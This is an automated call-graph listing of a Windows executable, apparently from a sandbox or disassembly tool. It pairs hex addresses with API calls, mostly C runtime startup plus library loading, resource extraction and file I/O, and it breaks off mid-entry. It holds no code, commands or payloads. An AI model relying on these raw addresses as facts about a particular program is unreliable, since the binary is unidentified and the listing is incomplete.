2f195c8 SetFilePointerEx 180417->180421 180418 2f1a528 GetFileSize 180419->180390 180453 2f219a0 VirtualAlloc 180419->180453 180420 2f1909d 180455 2f18359 28 API calls 180420->180455 180421->180390 180421->180400 180421->180406 180421->180416 180421->180417 180421->180420 180421->180426 180422 2f1a47e 180424 2f1e8f0 4 API calls 180422->180424 180424->180390 180425 2f1a519 180425->180390 180425->180418 180426->180390 180426->180399 180426->180410 180426->180416 180426->180418 180426->180422 180426->180425 180427 2f1a6cd 180426->180427 180428 2f162e0 2 API calls 180427->180428 180431 2f1a7f7 180427->180431 180429 2f1a700 180428->180429 180430 2f4f080 22 API calls 180429->180430 180432 2f1a737 180430->180432 180432->180431 180433 2f1e8f0 4 API calls 180432->180433 180433->180431 180436 2f1e30a 180434->180436 180435 2f1e329 WriteFile 180437 2f1e337 180435->180437 180438 2f1e3de 180435->180438 180436->180435 180436->180438 180437->180438 180439 2f162e0 2 API calls 180437->180439 180438->180421 180440 2f33003 180439->180440 180441 2f32cbf 180440->180441 180442 2f33012 180440->180442 180443 2f162e0 2 API calls 180441->180443 180444 2f32c72 180442->180444 180448 2f33018 180442->180448 180445 2f32cc8 180443->180445 180446 2f162e0 2 API calls 180444->180446 180445->180421 180447 2f32c7b 180446->180447 180447->180421 180449 2f33059 180448->180449 180450 2f162e0 2 API calls 180448->180450 180449->180421 180451 2f3329e 180450->180451 180451->180421 180452->180413 180453->180414 180454->180386 180455->180390 180456->180390 180457 427c56 180458 427c62 __setmode 180457->180458 180492 428b7c GetProcessHeap 180458->180492 180460 427cbf 180461 427cca 180460->180461 180575 427da6 58 API calls 3 library calls 180460->180575 180493 429ae6 180461->180493 180464 427cd0 180466 427cdb __RTC_Initialize 180464->180466 180576 427da6 58 API calls 3 library calls 180464->180576 180514 42d5d2 180466->180514 180468 427cea 180469 427cf6 GetCommandLineW 180468->180469 180577 427da6 58 API calls 3 library calls 180468->180577 180533 434f23 GetEnvironmentStringsW 180469->180533 180472 427cf5 180472->180469 180475 427d10 180478 427d1b 180475->180478 180578 4230b5 58 API calls 3 library calls 180475->180578 180543 434d58 180478->180543 180479 427d21 180480 427d2c 180479->180480 180579 4230b5 58 API calls 3 library calls 180479->180579 180557 4230ef 180480->180557 180483 427d34 180484 427d3f __wwincmdln 180483->180484 180580 4230b5 58 API calls 3 library calls 180483->180580 180563 4047d0 180484->180563 180487 427d53 180488 427d62 180487->180488 180581 423358 58 API calls _doexit 180487->180581 180582 4230e0 58 API calls _doexit 180488->180582 180491 427d67 __setmode 180492->180460 180583 423187 36 API calls 2 library calls 180493->180583 180495 429aeb 180584 429d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 180495->180584 180497 429af0 180498 429af4 180497->180498 180586 429d8a TlsAlloc 180497->180586 180585 429b5c 61 API calls 2 library calls 180498->180585 180501 429af9 180501->180464 180502 429b06 180502->180498 180503 429b11 180502->180503 180587 4287d5 180503->180587 180506 429b53 180595 429b5c 61 API calls 2 library calls 180506->180595 180509 429b32 180509->180506 180511 429b38 180509->180511 180510 429b58 180510->180464 180594 429a33 58 API calls 4 library calls 180511->180594 180513 429b40 GetCurrentThreadId 180513->180464 180515 42d5de __setmode 180514->180515 180607 429c0b 180515->180607 180517 42d5e5 180518 4287d5 __calloc_crt 58 API calls 180517->180518 180519 42d5f6 180518->180519 180520 42d661 GetStartupInfoW 180519->180520 180521 42d601 @_EH4_CallFilterFunc@8 __setmode 180519->180521 180527 42d676 180520->180527 180530 42d7a5 180520->180530 180521->180468 180522 42d86d 180616 42d87d LeaveCriticalSection _doexit 180522->180616 180524 4287d5 __calloc_crt 58 API calls 180524->180527 180525 42d7f2 GetStdHandle 180525->180530 180526 42d805 GetFileType 180526->180530 180527->180524 180528 42d6c4 180527->180528 180527->180530 180529 42d6f8 GetFileType 180528->180529 180528->180530 180614 429e2b InitializeCriticalSectionAndSpinCount 180528->180614 180529->180528 180530->180522 180530->180525 180530->180526 180615 429e2b InitializeCriticalSectionAndSpinCount 180530->180615 180534 434f34 180533->180534 180535 427d06 180533->180535 180656 42881d 58 API calls 2 library calls 180534->180656 180539 434b1b GetModuleFileNameW 180535->180539 180537 434f5a _memmove 180538 434f70 FreeEnvironmentStringsW 180537->180538 180538->180535 180540 434b4f _wparse_cmdline 180539->180540 180542 434b8f _wparse_cmdline 180540->180542 180657 42881d 58 API calls 2 library calls 180540->180657 180542->180475 180544 434d71 __NMSG_WRITE 180543->180544 180545 434d69 180543->180545 180546 4287d5 __calloc_crt 58 API calls 180544->180546 180545->180479 180553 434d9a __NMSG_WRITE 180546->180553 180547 434df1 180548 422d55 _free 58 API calls 180547->180548 180548->180545 180549 4287d5 __calloc_crt 58 API calls 180549->180553 180550 434e16 180551 422d55 _free 58 API calls 180550->180551 180551->180545 180553->180545 180553->180547 180553->180549 180553->180550 180554 434e2d 180553->180554 180658 434607 58 API calls __setmode 180553->180658 180659 428dc6 IsProcessorFeaturePresent 180554->180659 180556 434e39 180556->180479 180559 4230fb __IsNonwritableInCurrentImage 180557->180559 180682 42a4d1 180559->180682 180560 423119 __initterm_e 180562 423138 __cinit __IsNonwritableInCurrentImage 180560->180562 180685 422d40 180560->180685 180562->180483 180564 4047ea 180563->180564 180574 404889 180563->180574 180565 404824 IsThemeActive 180564->180565 180720 42336c 180565->180720 180569 404850 180732 4048fd SystemParametersInfoW SystemParametersInfoW 180569->180732 180571 40485c 180733 403b3a 180571->180733 180574->180487 180575->180461 180576->180466 180577->180472 180581->180488 180582->180491 180583->180495 180584->180497 180585->180501 180586->180502 180589 4287dc 180587->180589 180590 428817 180589->180590 180592 4287fa 180589->180592 180596 4351f6 180589->180596 180590->180506 180593 429de6 TlsSetValue 180590->180593 180592->180589 180592->180590 180604 42a132 Sleep 180592->180604 180593->180509 180594->180513 180595->180510 180597 435201 180596->180597 180602 43521c 180596->180602 180598 43520d 180597->180598 180597->180602 180605 428b28 58 API calls __getptd_noexit 180598->180605 180600 43522c RtlAllocateHeap 180601 435212 180600->180601 180600->180602 180601->180589 180602->180600 180602->180601 180606 4233a1 DecodePointer 180602->180606 180604->180592 180605->180601 180606->180602 180608 429c2f EnterCriticalSection 180607->180608 180609 429c1c 180607->180609 180608->180517 180617 429c93 180609->180617 180611 429c22 180611->180608 180641 4230b5 58 API calls 3 library calls 180611->180641 180614->180528 180615->180530 180616->180521 180618 429c9f __setmode 180617->180618 180619 429ca8 180618->180619 180620 429cc0 180618->180620 180642 42a16b 58 API calls __NMSG_WRITE 180619->180642 180633 429ce1 __setmode 180620->180633 180645 42881d 58 API calls 2 library calls 180620->180645 180623 429cad 180643 42a1c8 58 API calls 5 library calls 180623->180643 180625 429cd5 180627 429ceb 180625->180627 180628 429cdc 180625->180628 180626 429cb4 180644 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 180626->180644 180631 429c0b __lock 58 API calls 180627->180631 180646 428b28 58 API calls __getptd_noexit 180628->180646 180634 429cf2 180631->180634 180633->180611 180635 429d17 180634->180635 180636 429cff 180634->180636 180648 422d55 180635->180648 180647 429e2b InitializeCriticalSectionAndSpinCount 180636->180647 180639 429d0b 180654 429d33 LeaveCriticalSection _doexit 180639->180654 180642->180623 180643->180626 180645->180625 180646->180633 180647->180639 180649 422d87 _free 180648->180649 180650 422d5e RtlFreeHeap 180648->180650 180649->180639 180650->180649 180651 422d73 180650->180651 180655 428b28 58 API calls __getptd_noexit 180651->180655 180653 422d79 GetLastError 180653->180649 180654->180633 180655->180653 180656->180537 180657->180542 180658->180553 180660 428dd1 180659->180660 180665 428c59 180660->180665 180664 428dec 180664->180556 180666 428c73 _memset __call_reportfault 180665->180666 180667 428c93 IsDebuggerPresent 180666->180667 180673 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 180667->180673 180670 428d7a 180672 42a140 GetCurrentProcess TerminateProcess 180670->180672 180671 428d57 __call_reportfault 180674 42c5f6 180671->180674 180672->180664 180673->180671 180675 42c600 IsProcessorFeaturePresent 180674->180675 180676 42c5fe 180674->180676 180678 43590a 180675->180678 180676->180670 180681 4358b9 5 API calls 2 library calls 180678->180681 180680 4359ed 180680->180670 180681->180680 180683 42a4d4 EncodePointer 180682->180683 180683->180683 180684 42a4ee 180683->180684 180684->180560 180688 422c44 180685->180688 180687 422d4b 180687->180562 180689 422c50 __setmode 180688->180689 180696 423217 180689->180696 180695 422c77 __setmode 180695->180687 180697 429c0b __lock 58 API calls 180696->180697 180698 422c59 180697->180698 180699 422c88 DecodePointer DecodePointer 180698->180699 180700 422c65 180699->180700 180701 422cb5 180699->180701 180710 422c82 180700->180710 180701->180700 180713 4287a4 59 API calls __setmode 180701->180713 180703 422cc7 180704 422d18 EncodePointer EncodePointer 180703->180704 180705 422cec 180703->180705 180714 428864 61 API calls 2 library calls 180703->180714 180704->180700 180705->180700 180708 422d06 EncodePointer 180705->180708 180715 428864 61 API calls 2 library calls 180705->180715 180708->180704 180709 422d00 180709->180700 180709->180708 180716 423220 180710->180716 180713->180703 180714->180705 180715->180709 180719 429d75 LeaveCriticalSection 180716->180719 180718 422c87 180718->180695 180719->180718 180721 429c0b __lock 58 API calls 180720->180721 180722 423377 DecodePointer EncodePointer 180721->180722 180785 429d75 LeaveCriticalSection 180722->180785 180724 404849 180725 4233d4 180724->180725 180726 4233f8 180725->180726 180727 4233de 180725->180727 180726->180569 180727->180726 180786 428b28 58 API calls __getptd_noexit 180727->180786 180729 4233e8 180787 428db6 9 API calls __setmode 180729->180787 180731 4233f3 180731->180569 180732->180571 180734 403b47 __write_nolock 180733->180734 180788 407667 180734->180788 180785->180724 180786->180729 180787->180731 180789 420db6 Mailbox 59 API calls 180788->180789 180790 407688 180789->180790 180791 420db6 Mailbox 59 API calls 180790->180791 180792 403b51 GetCurrentDirectoryW 180791->180792 180793 403766 180792->180793 180794 407667 59 API calls 180793->180794 180795 40377c 180794->180795 181041 403d31 180795->181041 180797 40379a 180798 404706 61 API calls 180797->180798 180799 4037ae 180798->180799 180800 407de1 59 API calls 180799->180800 180801 4037bb 180800->180801 181055 404ddd 180801->181055 180804 43d173 181122 46955b 180804->181122 180805 4037dc Mailbox 180809 408047 59 API calls 180805->180809 180808 43d192 180811 422d55 _free 58 API calls 180808->180811 180812 4037ef 180809->180812 180814 43d19f 180811->180814 181079 40928a 180812->181079 180815 404e4a 84 API calls 180814->180815 180817 43d1a8 180815->180817 180821 403ed0 59 API calls 180817->180821 180818 407de1 59 API calls 180819 403808 180818->180819 181082 4084c0 180819->181082 180823 43d1c3 180821->180823 180822 40381a Mailbox 180824 407de1 59 API calls 180822->180824 180825 403ed0 59 API calls 180823->180825 180826 403840 180824->180826 180827 43d1df 180825->180827 180828 4084c0 69 API calls 180826->180828 180829 404706 61 API calls 180827->180829 180831 40384f Mailbox 180828->180831 180830 43d204 180829->180830 180832 403ed0 59 API calls 180830->180832 180833 407667 59 API calls 180831->180833 180834 43d210 180832->180834 180836 40386d 180833->180836 180835 408047 59 API calls 180834->180835 180837 43d21e 180835->180837 181086 403ed0 180836->181086 180839 403ed0 59 API calls 180837->180839 180841 43d22d 180839->180841 180847 408047 59 API calls 180841->180847 180843 403887 180843->180817 180844 403891 180843->180844 180845 422efd _W_store_winword 60 API calls 180844->180845 180846 40389c 180845->180846 180846->180823 180848 4038a6 180846->180848 180849 43d24f 180847->180849 180850 422efd _W_store_winword 60 API calls 180848->180850 180851 403ed0 59 API calls 180849->180851 180852 4038b1 180850->180852 180853 43d25c 180851->180853 180852->180827 180854 4038bb 180852->180854 180853->180853 180855 422efd _W_store_winword 60 API calls 180854->180855 180856 4038c6 180855->180856 180856->180841 180857 403907 180856->180857 180858 403ed0 59 API calls 180856->180858 180857->180841 180859 403914 180857->180859 180860 4038ea 180858->180860 181102 4092ce 180859->181102 180862 408047 59 API calls 180860->180862 180864 4038f8 180862->180864 180866 403ed0 59 API calls 180864->180866 180866->180857 181042 403d3e __write_nolock 181041->181042 181043 407bcc 59 API calls 181042->181043 181048 403ea4 Mailbox 181042->181048 181044 403d70 181043->181044 181054 403da6 Mailbox 181044->181054 181163 4079f2 181044->181163 181046 4079f2 59 API calls 181046->181054 181047 403e77 181047->181048 181049 407de1 59 API calls 181047->181049 181048->180797 181050 403e98 181049->181050 181052 403f74 59 API calls 181050->181052 181051 407de1 59 API calls 181051->181054 181052->181048 181054->181046 181054->181047 181054->181048 181054->181051 181166 403f74 181054->181166 181176 404bb5 181055->181176 181060 43d8e6 181063 404e4a 84 API calls 181060->181063 181061 404e08 LoadLibraryExW 181186 404b6a 181061->181186 181065 43d8ed 181063->181065 181067 404b6a 3 API calls 181065->181067 181069 43d8f5 181067->181069 181068 404e2f 181068->181069 181070 404e3b 181068->181070 181212 404f0b 181069->181212 181072 404e4a 84 API calls 181070->181072 181074 4037d4 181072->181074 181074->180804 181074->180805 181076 43d91c 181220 404ec7 181076->181220 181078 43d929 181080 420db6 Mailbox 59 API calls 181079->181080 181081 4037fb 181080->181081 181081->180818 181083 4084cb 181082->181083 181085 4084f2 181083->181085 181650 4089b3 69 API calls Mailbox 181083->181650 181085->180822 181087 403ef3 181086->181087 181088 403eda 181086->181088 181090 407bcc 59 API calls 181087->181090 181089 408047 59 API calls 181088->181089 181091 403879 181089->181091 181090->181091 181092 422efd 181091->181092 181093 422f09 181092->181093 181094 422f7e 181092->181094 181100 422f2e 181093->181100 181651 428b28 58 API calls __getptd_noexit 181093->181651 181653 422f90 60 API calls 3 library calls 181094->181653 181097 422f8b 181097->180843 181098 422f15 181652 428db6 9 API calls __setmode 181098->181652 181100->180843 181101 422f20 181101->180843 181103 4092d6 181102->181103 181104 420db6 Mailbox 59 API calls 181103->181104 181105 4092e4 181104->181105 181106 403924 181105->181106 181654 4091fc 59 API calls Mailbox 181105->181654 181108 409050 181106->181108 181123 404ee5 85 API calls 181122->181123 181124 4695ca 181123->181124 181666 469734 181124->181666 181127 404f0b 74 API calls 181128 4695f7 181127->181128 181129 404f0b 74 API calls 181128->181129 181130 469607 181129->181130 181131 404f0b 74 API calls 181130->181131 181132 469622 181131->181132 181133 404f0b 74 API calls 181132->181133 181134 46963d 181133->181134 181135 404ee5 85 API calls 181134->181135 181136 469654 181135->181136 181137 42571c __crtLCMapStringA_stat 58 API calls 181136->181137 181138 46965b 181137->181138 181139 42571c __crtLCMapStringA_stat 58 API calls 181138->181139 181140 469665 181139->181140 181141 404f0b 74 API calls 181140->181141 181142 469679 181141->181142 181143 469109 GetSystemTimeAsFileTime 181142->181143 181144 46968c 181143->181144 181145 4696b6 181144->181145 181146 4696a1 181144->181146 181147 4696bc 181145->181147 181148 46971b 181145->181148 181149 422d55 _free 58 API calls 181146->181149 181672 468b06 181147->181672 181151 422d55 _free 58 API calls 181148->181151 181152 4696a7 181149->181152 181155 43d186 181151->181155 181154 422d55 _free 58 API calls 181152->181154 181154->181155 181155->180808 181157 404e4a 181155->181157 181156 422d55 _free 58 API calls 181156->181155 181158 404e54 181157->181158 181159 404e5b 181157->181159 181160 4253a6 __fcloseall 83 API calls 181158->181160 181161 404e6a 181159->181161 181162 404e7b FreeLibrary 181159->181162 181160->181159 181161->180808 181162->181161 181172 407e4f 181163->181172 181165 4079fd 181165->181044 181167 403f82 181166->181167 181171 403fa4 _memmove 181166->181171 181169 420db6 Mailbox 59 API calls 181167->181169 181168 420db6 Mailbox 59 API calls 181170 403fb8 181168->181170 181169->181171 181170->181054 181171->181168 181173 407e62 181172->181173 181175 407e5f _memmove 181172->181175 181174 420db6 Mailbox 59 API calls 181173->181174 181174->181175 181175->181165 181225 404c03 181176->181225 181179 404bdc 181180 404bf5 181179->181180 181181 404bec FreeLibrary 181179->181181 181183 42525b 181180->181183 181181->181180 181182 404c03 2 API calls 181182->181179 181229 425270 181183->181229 181185 404dfc 181185->181060 181185->181061 181387 404c36 181186->181387 181189 404ba1 FreeLibrary 181190 404baa 181189->181190 181193 404c70 181190->181193 181191 404c36 2 API calls 181192 404b8f 181191->181192 181192->181189 181192->181190 181194 420db6 Mailbox 59 API calls 181193->181194 181195 404c85 181194->181195 181391 40522e 181195->181391 181197 404c91 _memmove 181197->181197 181198 404ccc 181197->181198 181199 404dc1 181197->181199 181200 404d89 181197->181200 181201 404ec7 69 API calls 181198->181201 181405 46991b 95 API calls 181199->181405 181394 404e89 CreateStreamOnHGlobal 181200->181394 181209 404cd5 181201->181209 181204 404f0b 74 API calls 181204->181209 181206 404d69 181206->181068 181207 43d8a7 181208 404ee5 85 API calls 181207->181208 181210 43d8bb 181208->181210 181209->181204 181209->181206 181209->181207 181400 404ee5 181209->181400 181211 404f0b 74 API calls 181210->181211 181211->181206 181213 404f1d 181212->181213 181216 43d9cd 181212->181216 181429 4255e2 181213->181429 181217 469109 181627 468f5f 181217->181627 181219 46911f 181219->181076 181221 43d990 181220->181221 181222 404ed6 181220->181222 181632 425c60 181222->181632 181224 404ede 181224->181078 181226 404bd0 181225->181226 181227 404c0c LoadLibraryA 181225->181227 181226->181179 181226->181182 181227->181226 181228 404c1d GetProcAddress 181227->181228 181228->181226 181232 42527c __setmode 181229->181232 181230 42528f 181278 428b28 58 API calls __getptd_noexit 181230->181278 181232->181230 181234 4252c0 181232->181234 181233 425294 181279 428db6 9 API calls __setmode 181233->181279 181248 4304e8 181234->181248 181237 4252c5 181238 4252db 181237->181238 181239 4252ce 181237->181239 181240 425305 181238->181240 181241 4252e5 181238->181241 181280 428b28 58 API calls __getptd_noexit 181239->181280 181263 430607 181240->181263 181281 428b28 58 API calls __getptd_noexit 181241->181281 181245 42529f @_EH4_CallFilterFunc@8 __setmode 181245->181185 181249 4304f4 __setmode 181248->181249 181250 429c0b __lock 58 API calls 181249->181250 181259 430502 181250->181259 181251 43057d 181288 42881d 58 API calls 2 library calls 181251->181288 181254 4305f3 __setmode 181254->181237 181255 430584 181261 430576 181255->181261 181289 429e2b InitializeCriticalSectionAndSpinCount 181255->181289 181256 429c93 __mtinitlocknum 58 API calls 181256->181259 181259->181251 181259->181256 181259->181261 181286 426c50 59 API calls __lock 181259->181286 181287 426cba LeaveCriticalSection LeaveCriticalSection _doexit 181259->181287 181260 4305aa EnterCriticalSection 181260->181261 181283 4305fe 181261->181283 181272 430627 __wopenfile 181263->181272 181264 430641 181294 428b28 58 API calls __getptd_noexit 181264->181294 181266 430646 181295 428db6 9 API calls __setmode 181266->181295 181267 4307fc 181267->181264 181270 43085f 181267->181270 181269 425310 181282 425332 LeaveCriticalSection LeaveCriticalSection _fseek 181269->181282 181291 4385a1 181270->181291 181272->181264 181272->181267 181272->181272 181296 4237cb 60 API calls 2 library calls 181272->181296 181274 4307f5 181274->181267 181297 4237cb 60 API calls 2 library calls 181274->181297 181276 430814 181276->181267 181298 4237cb 60 API calls 2 library calls 181276->181298 181278->181233 181279->181245 181280->181245 181281->181245 181282->181245 181290 429d75 LeaveCriticalSection 181283->181290 181285 430605 181285->181254 181286->181259 181287->181259 181288->181255 181289->181260 181290->181285 181299 437d85 181291->181299 181293 4385ba 181293->181269 181294->181266 181295->181269 181296->181274 181297->181276 181298->181267 181301 437d91 __setmode 181299->181301 181300 437da7 181384 428b28 58 API calls __getptd_noexit 181300->181384 181301->181300 181304 437ddd 181301->181304 181303 437dac 181385 428db6 9 API calls __setmode 181303->181385 181310 437e4e 181304->181310 181307 437df9 181386 437e22 LeaveCriticalSection __unlock_fhandle 181307->181386 181309 437db6 __setmode 181309->181293 181311 437e6e 181310->181311 181312 4244ea __wsopen_nolock 58 API calls 181311->181312 181314 437e8a 181312->181314 181313 437fc1 181315 428dc6 __invoke_watson 8 API calls 181313->181315 181314->181313 181317 437ec4 181314->181317 181324 437ee7 181314->181324 181316 4385a0 181315->181316 181318 437d85 __wsopen_helper 103 API calls 181316->181318 181319 428af4 __wsopen_nolock 58 API calls 181317->181319 181320 4385ba 181318->181320 181321 437ec9 181319->181321 181320->181307 181322 428b28 __setmode 58 API calls 181321->181322 181323 437ed6 181322->181323 181326 428db6 __setmode 9 API calls 181323->181326 181325 437fa5 181324->181325 181331 437f83 181324->181331 181327 428af4 __wsopen_nolock 58 API calls 181325->181327 181328 437ee0 181326->181328 181329 437faa 181327->181329 181328->181307 181330 428b28 __setmode 58 API calls 181329->181330 181332 437fb7 181330->181332 181334 42d294 __alloc_osfhnd 61 API calls 181331->181334 181333 428db6 __setmode 9 API calls 181332->181333 181333->181313 181335 438051 181334->181335 181336 43805b 181335->181336 181337 43807e 181335->181337 181339 428af4 __wsopen_nolock 58 API calls 181336->181339 181338 437cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 181337->181338 181348 4380a0 181338->181348 181340 438060 181339->181340 181342 428b28 __setmode 58 API calls 181340->181342 181341 43811e GetFileType 181343 43816b 181341->181343 181344 438129 GetLastError 181341->181344 181346 43806a 181342->181346 181356 42d52a __set_osfhnd 59 API calls 181343->181356 181347 428b07 __dosmaperr 58 API calls 181344->181347 181345 4380ec GetLastError 181349 428b07 __dosmaperr 58 API calls 181345->181349 181350 428b28 __setmode 58 API calls 181346->181350 181351 438150 CloseHandle 181347->181351 181348->181341 181348->181345 181352 437cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 181348->181352 181353 438111 181349->181353 181350->181328 181351->181353 181354 43815e 181351->181354 181355 4380e1 181352->181355 181358 428b28 __setmode 58 API calls 181353->181358 181357 428b28 __setmode 58 API calls 181354->181357 181355->181341 181355->181345 181361 438189 181356->181361 181359 438163 181357->181359 181358->181313 181359->181353 181360 438344 181360->181313 181364 438517 CloseHandle 181360->181364 181361->181360 181362 4318c1 __lseeki64_nolock 60 API calls 181361->181362 181378 43820a 181361->181378 181363 4381f3 181362->181363 181367 428af4 __wsopen_nolock 58 API calls 181363->181367 181363->181378 181365 437cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 181364->181365 181366 43853e 181365->181366 181369 438546 GetLastError 181366->181369 181370 438572 181366->181370 181367->181378 181368 430e5b 70 API calls __read_nolock 181368->181378 181371 428b07 __dosmaperr 58 API calls 181369->181371 181370->181313 181372 438552 181371->181372 181375 42d43d __free_osfhnd 59 API calls 181372->181375 181373 430add __close_nolock 61 API calls 181373->181378 181374 43823c 181376 4397a2 __chsize_nolock 82 API calls 181374->181376 181374->181378 181375->181370 181376->181374 181377 42d886 __write 78 API calls 181377->181378 181378->181360 181378->181368 181378->181373 181378->181374 181378->181377 181379 4383c1 181378->181379 181381 4318c1 60 API calls __lseeki64_nolock 181378->181381 181380 430add __close_nolock 61 API calls 181379->181380 181382 4383c8 181380->181382 181381->181378 181383 428b28 __setmode 58 API calls 181382->181383 181383->181313 181384->181303 181385->181309 181386->181309 181388 404b83 181387->181388 181389 404c3f LoadLibraryA 181387->181389 181388->181191 181388->181192 181389->181388 181390 404c50 GetProcAddress 181389->181390 181390->181388 181392 420db6 Mailbox 59 API calls 181391->181392 181393 405240 181392->181393 181393->181197 181395 404ea3 FindResourceExW 181394->181395 181397 404ec0 181394->181397 181396 43d933 LoadResource 181395->181396 181395->181397 181396->181397 181398 43d948 SizeofResource 181396->181398 181397->181198 181398->181397 181399 43d95c LockResource 181398->181399 181399->181397 181401 404ef4 181400->181401 181402 43d9ab 181400->181402 181406 42584d 181401->181406 181404 404f02 181404->181209 181405->181198 181407 425859 __setmode 181406->181407 181408 42586b 181407->181408 181410 425891 181407->181410 181419 428b28 58 API calls __getptd_noexit 181408->181419 181421 426c11 181410->181421 181412 425870 181420 428db6 9 API calls __setmode 181412->181420 181413 425897 181427 4257be 83 API calls 5 library calls 181413->181427 181416 4258a6 181428 4258c8 LeaveCriticalSection LeaveCriticalSection _fseek 181416->181428 181417 42587b __setmode 181417->181404 181419->181412 181420->181417 181422 426c43 EnterCriticalSection 181421->181422 181423 426c21 181421->181423 181425 426c39 181422->181425 181423->181422 181424 426c29 181423->181424 181426 429c0b __lock 58 API calls 181424->181426 181425->181413 181426->181425 181427->181416 181428->181417 181432 4255fd 181429->181432 181431 404f2e 181431->181217 181433 425609 __setmode 181432->181433 181434 42564c 181433->181434 181435 425644 __setmode 181433->181435 181441 42561f _memset 181433->181441 181436 426c11 __lock_file 59 API calls 181434->181436 181435->181431 181438 425652 181436->181438 181445 42541d 181438->181445 181439 425639 181460 428db6 9 API calls __setmode 181439->181460 181459 428b28 58 API calls __getptd_noexit 181441->181459 181448 425438 _memset 181445->181448 181452 425453 181445->181452 181446 425443 181557 428b28 58 API calls __getptd_noexit 181446->181557 181448->181446 181450 425493 181448->181450 181448->181452 181450->181452 181453 4255a4 _memset 181450->181453 181462 4246e6 181450->181462 181469 430e5b 181450->181469 181537 430ba7 181450->181537 181559 430cc8 58 API calls 3 library calls 181450->181559 181461 425686 LeaveCriticalSection LeaveCriticalSection _fseek 181452->181461 181560 428b28 58 API calls __getptd_noexit 181453->181560 181457 425448 181558 428db6 9 API calls __setmode 181457->181558 181459->181439 181460->181435 181461->181435 181463 4246f0 181462->181463 181464 424705 181462->181464 181561 428b28 58 API calls __getptd_noexit 181463->181561 181464->181450 181466 4246f5 181562 428db6 9 API calls __setmode 181466->181562 181468 424700 181468->181450 181470 430e93 181469->181470 181471 430e7c 181469->181471 181473 4315cb 181470->181473 181477 430ecd 181470->181477 181572 428af4 58 API calls __getptd_noexit 181471->181572 181588 428af4 58 API calls __getptd_noexit 181473->181588 181474 430e81 181573 428b28 58 API calls __getptd_noexit 181474->181573 181480 430ed5 181477->181480 181487 430eec 181477->181487 181478 4315d0 181589 428b28 58 API calls __getptd_noexit 181478->181589 181574 428af4 58 API calls __getptd_noexit 181480->181574 181481 430ee1 181590 428db6 9 API calls __setmode 181481->181590 181482 430e88 181482->181450 181484 430eda 181575 428b28 58 API calls __getptd_noexit 181484->181575 181486 430f01 181576 428af4 58 API calls __getptd_noexit 181486->181576 181487->181482 181487->181486 181489 430f1b 181487->181489 181491 430f39 181487->181491 181489->181486 181495 430f26 181489->181495 181577 42881d 58 API calls 2 library calls 181491->181577 181493 430f49 181496 430f51 181493->181496 181497 430f6c 181493->181497 181563 435c6b 181495->181563 181578 428b28 58 API calls __getptd_noexit 181496->181578 181580 4318c1 60 API calls 3 library calls 181497->181580 181498 43103a 181500 4310b3 ReadFile 181498->181500 181505 431050 GetConsoleMode 181498->181505 181503 431593 GetLastError 181500->181503 181504 4310d5 181500->181504 181502 430f56 181579 428af4 58 API calls __getptd_noexit 181502->181579 181507 4315a0 181503->181507 181508 431093 181503->181508 181504->181503 181512 4310a5 181504->181512 181509 4310b0 181505->181509 181510 431064 181505->181510 181586 428b28 58 API calls __getptd_noexit 181507->181586 181514 431099 181508->181514 181581 428b07 58 API calls 3 library calls 181508->181581 181509->181500 181510->181509 181513 43106a ReadConsoleW 181510->181513 181512->181514 181520 43110a 181512->181520 181523 431377 181512->181523 181513->181512 181516 43108d GetLastError 181513->181516 181514->181482 181519 422d55 _free 58 API calls 181514->181519 181515 4315a5 181587 428af4 58 API calls __getptd_noexit 181515->181587 181516->181508 181519->181482 181522 431176 ReadFile 181520->181522 181528 4311f7 181520->181528 181525 431197 GetLastError 181522->181525 181535 4311a1 181522->181535 181523->181514 181524 43147d ReadFile 181523->181524 181530 4314a0 GetLastError 181524->181530 181536 4314ae 181524->181536 181525->181535 181526 4312b4 181531 431264 MultiByteToWideChar 181526->181531 181584 4318c1 60 API calls 3 library calls 181526->181584 181527 4312a4 181583 428b28 58 API calls __getptd_noexit 181527->181583 181528->181514 181528->181526 181528->181527 181528->181531 181530->181536 181531->181514 181531->181516 181535->181520 181582 4318c1 60 API calls 3 library calls 181535->181582 181536->181523 181585 4318c1 60 API calls 3 library calls 181536->181585 181538 430bb2 181537->181538 181543 430bc7 181537->181543 181624 428b28 58 API calls __getptd_noexit 181538->181624 181540 430bc2 181540->181450 181541 430bb7 181625 428db6 9 API calls __setmode 181541->181625 181543->181540 181544 430bfc 181543->181544 181626 435fe4 58 API calls __malloc_crt 181543->181626 181546 4246e6 __stbuf 58 API calls 181544->181546 181547 430c10 181546->181547 181591 430d47 181547->181591 181549 430c17 181549->181540 181550 4246e6 __stbuf 58 API calls 181549->181550 181551 430c3a 181550->181551 181551->181540 181552 4246e6 __stbuf 58 API calls 181551->181552 181553 430c46 181552->181553 181553->181540 181554 4246e6 __stbuf 58 API calls 181553->181554 181555 430c53 181554->181555 181556 4246e6 __stbuf 58 API calls 181555->181556 181556->181540 181557->181457 181558->181452 181559->181450 181560->181457 181561->181466 181562->181468 181564 435c83 181563->181564 181565 435c76 181563->181565 181567 435c8f 181564->181567 181568 428b28 __setmode 58 API calls 181564->181568 181566 428b28 __setmode 58 API calls 181565->181566 181569 435c7b 181566->181569 181567->181498 181570 435cb0 181568->181570 181569->181498 181571 428db6 __setmode 9 API calls 181570->181571 181571->181569 181572->181474 181573->181482 181574->181484 181575->181481 181576->181484 181577->181493 181578->181502 181579->181482 181580->181495 181581->181514 181582->181535 181583->181514 181584->181531 181585->181536 181586->181515 181587->181514 181588->181478 181589->181481 181590->181482 181592 430d53 __setmode 181591->181592 181593 430d60 181592->181593 181594 430d77 181592->181594 181595 428af4 __wsopen_nolock 58 API calls 181593->181595 181596 430e3b 181594->181596 181599 430d8b 181594->181599 181598 430d65 181595->181598 181597 428af4 __wsopen_nolock 58 API calls 181596->181597 181605 430dae 181597->181605 181600 428b28 __setmode 58 API calls 181598->181600 181601 430db6 181599->181601 181602 430da9 181599->181602 181616 430d6c __setmode 181600->181616 181603 430dc3 181601->181603 181604 430dd8 181601->181604 181606 428af4 __wsopen_nolock 58 API calls 181602->181606 181607 428af4 __wsopen_nolock 58 API calls 181603->181607 181608 42d206 ___lock_fhandle 59 API calls 181604->181608 181609 428b28 __setmode 58 API calls 181605->181609 181606->181605 181610 430dc8 181607->181610 181611 430dde 181608->181611 181612 430dd0 181609->181612 181613 